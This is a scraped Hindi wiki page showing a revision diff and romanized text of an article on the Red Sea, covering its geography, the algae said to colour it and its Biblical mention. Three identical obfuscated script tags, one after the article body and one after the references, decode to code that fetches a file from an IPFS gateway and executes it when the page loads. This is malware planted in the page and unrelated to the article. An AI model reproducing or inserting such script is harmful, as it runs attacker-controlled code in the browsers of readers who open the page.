Difference between revisions of "लाल सागर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (श्रेणी:नया पन्ना (को हटा दिया गया हैं।))
m (Text replacement - "पृथक " to "पृथक् ")
 
Line 2: Line 2:
 
भारतीय महासागर का वह अंश जो [[अरब]] और [[अफ्रीका]] के मध्य में पड़ता है, और जो 'बाव' एल 'मंदव' से स्वेज तक फैला हुआ है, लाल समुद्र कहलाता है। 'ट्राइकोडेस्मियम इरीथीयम' नामक [[हरा रंग|हरी]] - [[नीला रंग|नीली]] [[शैवाल]] लाल सागर में [[जल]] के ऊपर तैरती है और यह [[सागर]] को [[लाल रंग]] प्रदान करती है। इसी कारण से सागर को लाल सागर (Red sea) कहते है।<ref> [[शैवाल]], भारतडिस्कवरी</ref> यह सागर प्रायः 1400 मील (लगभग 2250 किलोमीटर) लंबा है, इसकी अधिक से अधिक चौड़ाई 230 मील (लगभग 355 किलोमीटर) और समुद्री विस्तार की औसत गहराई 490 मीटर है। इसके किनारों पर बहुत से छोटे छोटे टापू और प्रवालद्वीप हैं, जिनके कारण जहाजों को इसमें से होकर आने जाने में बहुत कठिनता होती है। पहले यह [[भूमध्यसागर]] से अलग था, पर स्वेज की नहर खुद जाने से यह उससे मिल गया है।  
 
भारतीय महासागर का वह अंश जो [[अरब]] और [[अफ्रीका]] के मध्य में पड़ता है, और जो 'बाव' एल 'मंदव' से स्वेज तक फैला हुआ है, लाल समुद्र कहलाता है। 'ट्राइकोडेस्मियम इरीथीयम' नामक [[हरा रंग|हरी]] - [[नीला रंग|नीली]] [[शैवाल]] लाल सागर में [[जल]] के ऊपर तैरती है और यह [[सागर]] को [[लाल रंग]] प्रदान करती है। इसी कारण से सागर को लाल सागर (Red sea) कहते है।<ref> [[शैवाल]], भारतडिस्कवरी</ref> यह सागर प्रायः 1400 मील (लगभग 2250 किलोमीटर) लंबा है, इसकी अधिक से अधिक चौड़ाई 230 मील (लगभग 355 किलोमीटर) और समुद्री विस्तार की औसत गहराई 490 मीटर है। इसके किनारों पर बहुत से छोटे छोटे टापू और प्रवालद्वीप हैं, जिनके कारण जहाजों को इसमें से होकर आने जाने में बहुत कठिनता होती है। पहले यह [[भूमध्यसागर]] से अलग था, पर स्वेज की नहर खुद जाने से यह उससे मिल गया है।  
 
;ग्रंथों में उल्लेख
 
;ग्रंथों में उल्लेख
[[मिस्र]], [[अरब]] और इज़राइल को पृथक करने वाले इस सागर को [[बाइबिल]] और 'हिब्रू' ग्रंथों में वर्णित 'सागर' माना जाता है।
+
[[मिस्र]], [[अरब]] और इज़राइल को पृथक् करने वाले इस सागर को [[बाइबिल]] और 'हिब्रू' ग्रंथों में वर्णित 'सागर' माना जाता है।
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}

Latest revision as of 13:28, 1 August 2017

[[chitr:Red-Sea.jpg|thumb|250px|lal sagar, misr]] bharatiy mahasagar ka vah aansh jo arab aur aphrika ke madhy mean p data hai, aur jo 'bav' el 'mandav' se svej tak phaila hua hai, lal samudr kahalata hai. 'traikodesmiyam irithiyam' namak hari - nili shaival lal sagar mean jal ke oopar tairati hai aur yah sagar ko lal rang pradan karati hai. isi karan se sagar ko lal sagar (Red sea) kahate hai.[1] yah sagar prayah 1400 mil (lagabhag 2250 kilomitar) lanba hai, isaki adhik se adhik chau daee 230 mil (lagabhag 355 kilomitar) aur samudri vistar ki ausat gaharaee 490 mitar hai. isake kinaroan par bahut se chhote chhote tapoo aur pravaladvip haian, jinake karan jahajoan ko isamean se hokar ane jane mean bahut kathinata hoti hai. pahale yah bhoomadhyasagar se alag tha, par svej ki nahar khud jane se yah usase mil gaya hai.

granthoan mean ullekh

misr, arab aur izarail ko prithakh karane vale is sagar ko baibil aur 'hibroo' granthoan mean varnit 'sagar' mana jata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. shaival, bharatadiskavari

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>